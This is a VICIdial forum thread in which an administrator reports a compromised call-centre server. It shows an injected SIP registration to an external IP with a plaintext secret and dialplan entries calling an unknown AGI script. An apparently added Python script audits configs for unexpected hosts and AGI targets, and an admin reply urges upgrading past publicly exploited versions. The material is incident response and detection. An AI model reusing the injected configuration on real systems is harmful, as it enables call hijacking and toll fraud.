VICIDIAL HACK some file injected


VICIDIAL HACK some file injected

Postby Farzvoip » Thu Mar 09, 2023 3:32 pm

hello,



Recently I have noticed some kind of files injected into my vicibox server. Firstly I noticed that all my carriers had disappeared: from root, when I type

asterisk -rx "sip show registry"

the outcome is

104.238.131.72:45931 N Endpoint 120 Registered Thu, 09 Mar 2023 15:17:27

and all my carriers have disappeared apart from the one above.

So I tried to find out what the matter was. I went to /etc/asterisk/sip.conf and saw there was an unknown carrier registered like this:


register => Endpoint:99ruPP41Q97qsyGT@104.238.131.72:45931

[Endpoint]
type = friend
context = default
host = 104.238.131.72
port = 45931
qualify = no

When I deleted this one and reloaded SIP, all the carriers appeared again.


I tried to find out more and found some extra unknown files had been injected into /etc/asterisk/extensions.conf:

[
; VICIDIAL query
exten => 8397,1,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,QUERY)
exten => 8397,n,Hangup()

; VICIDIAL direct
exten => _8398*.,1,Set(USER=${CUT(EXTEN,*,2)})
exten => _8398*.,n,Set(DIALCODE=${CUT(EXTEN,*,3)})
exten => _8398*.,n,Set(CALLERID=${CUT(EXTEN,*,4)})
exten => _8398*.,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN_DIRECT-----${USER}-----${DIALCODE}-----${CALLERID})
exten => _8398*.,n,Hangup()

; VICIDIAL campaign
exten => _8399!,1,Set(CAMPAIGN=${CUT(EXTEN,*,2)})
exten => _8399!,n,Set(DIALCODE=${CUT(EXTEN,*,3)})
exten => _8399!,n,Set(CALLERID=${CUT(EXTEN,*,4)})
exten => _8399!,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN-----${CAMPAIGN}-----${DIALCODE}-----${CALLERID})
exten => _8399!,n,Hangup()

]


I have deleted this one, and also from the directory.

But the thing is: how have they got into my server, and how have they injected the files?

And after removing them, the same injected file and carrier were put back by the hackers. How do I stop them from getting into my server?

Action done:
root password changed

Please let me know any suggestions, and how to increase security.



System: cloud server
VERSION: 2.14-830a
BUILD: 210920-2159
© 2021 ViciDial Group
Asterisk version 11.25.1-vici, tried in vicibox 7.0.4,
server Intel(R) Xeon(R) CPU E3-1230 v3 @ 3.30GHz
Farzvoip
 
Posts: 19
Joined: Wed Dec 22, 2021 5:59 pm
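A defender-side check for the kind of re-injection described in this post, written here as an added example (it is not code from the post, nor from the VICIdial project): it parses sip.conf and extensions.conf and reports every register line, static peer host, or AGI() target that is not on an administrator-maintained allowlist built from a known-good copy of the configs. The sample configs are constructed from the entries quoted above plus one legitimate-looking carrier; the hostname carrier.example.net, the FastAGI allowlist entry, and the allowlists themselves are assumptions.

```python
import re
from typing import Dict, List, Set, Tuple

# Added example, not code from the original post or from the VICIdial project.
# Constructed sample of /etc/asterisk/sip.conf: the injected entries quoted in the post
# plus one legitimate-looking carrier ("carrier.example.net" is an assumed placeholder).
SIP_CONF = """\
[general]
context=default

register => Endpoint:99ruPP41Q97qsyGT@104.238.131.72:45931
register => myuser:s3cret@carrier.example.net

[Endpoint]
type = friend
context = default
host = 104.238.131.72
port = 45931
qualify = no

[carrier1]
type=peer
host=carrier.example.net
"""

# Constructed sample of /etc/asterisk/extensions.conf: two of the injected AGI lines from
# the post plus one assumed legitimate FastAGI call (the exact allowlist is an assumption).
EXTENSIONS_CONF = """\
[default]
; VICIDIAL query
exten => 8397,1,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,QUERY)
exten => 8397,n,Hangup()
exten => _8399!,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN-----${CAMPAIGN}-----${DIALCODE}-----${CALLERID})
exten => 8300,1,AGI(agi://127.0.0.1:4577/call_log)
"""

# Allowlists the administrator derives from a known-good baseline (assumed values).
KNOWN_HOSTS: Set[str] = {"carrier.example.net"}
KNOWN_AGI: Set[str] = {"agi://127.0.0.1:4577/call_log"}

# register => user[:secret[:authuser]]@host[:port][/extension]  -> capture host
REGISTER_RE = re.compile(r"^\s*register\s*=>?\s*(?:.*@)?([^:/\s]+)")
SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]")
KV_RE = re.compile(r"^\s*([A-Za-z_]+)\s*=>?\s*(.*?)\s*$")   # Asterisk accepts '=' or '=>'
AGI_RE = re.compile(r"AGI\(([^,)]+)")                         # script/URL before the first ','


def _strip_comment(line: str) -> str:
    """Drop an Asterisk ';' comment (sufficient for these config files)."""
    return line.split(";", 1)[0]


def unknown_registrations(conf: str, known_hosts: Set[str]) -> List[Tuple[int, str]]:
    """(line number, host) for every register line whose host is not allowlisted."""
    hits = []
    for n, raw in enumerate(conf.splitlines(), 1):
        m = REGISTER_RE.match(_strip_comment(raw))
        if m and m.group(1) not in known_hosts:
            hits.append((n, m.group(1)))
    return hits


def unknown_peer_hosts(conf: str, known_hosts: Set[str]) -> List[Tuple[str, str]]:
    """(section, host) for every peer/friend section with a static host not allowlisted."""
    hits, section = [], ""
    for raw in conf.splitlines():
        line = _strip_comment(raw)
        s = SECTION_RE.match(line)
        if s:
            section = s.group(1)
            continue
        if REGISTER_RE.match(line):
            continue                     # handled by unknown_registrations()
        kv = KV_RE.match(line)
        if kv and kv.group(1).lower() == "host":
            host = kv.group(2)
            if host != "dynamic" and host not in known_hosts:
                hits.append((section, host))
    return hits


def unknown_agi_scripts(conf: str, known_agi: Set[str]) -> List[Tuple[int, str]]:
    """(line number, script) for every AGI() call whose target is not allowlisted."""
    hits = []
    for n, raw in enumerate(conf.splitlines(), 1):
        for script in AGI_RE.findall(_strip_comment(raw)):
            if script not in known_agi:
                hits.append((n, script))
    return hits


def audit(sip_conf: str = SIP_CONF, ext_conf: str = EXTENSIONS_CONF) -> Dict[str, list]:
    """Run all three checks and return the findings keyed by check name."""
    return {
        "registration": unknown_registrations(sip_conf, KNOWN_HOSTS),
        "peer": unknown_peer_hosts(sip_conf, KNOWN_HOSTS),
        "agi": unknown_agi_scripts(ext_conf, KNOWN_AGI),
    }


if __name__ == "__main__":
    for kind, findings in audit().items():
        for where, what in findings:
            print(f"UNEXPECTED {kind}: {where} -> {what}")
```

Run against the real files (read them in place of the constructed strings) from cron or a monitoring agent; any non-empty result after the baseline has been established means the configs changed outside your change process, which is exactly the re-injection the post describes. Pair it with a file-integrity check on /usr/share/asterisk/agi-bin so a newly dropped .agi script is reported even before a dialplan line references it.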

Re: VICIDIAL HACK some file injected

Postby mflorell » Thu Mar 09, 2023 5:55 pm

The version of VICIdial you are using is 18 months old; there have been several public exploits published that are present in your system. I would strongly recommend upgrading to the latest svn/trunk revision of VICIdial.
mflorell
Site Admin
 
Posts: 18335
Joined: Wed Jun 07, 2006 2:45 pm
Location: Florida

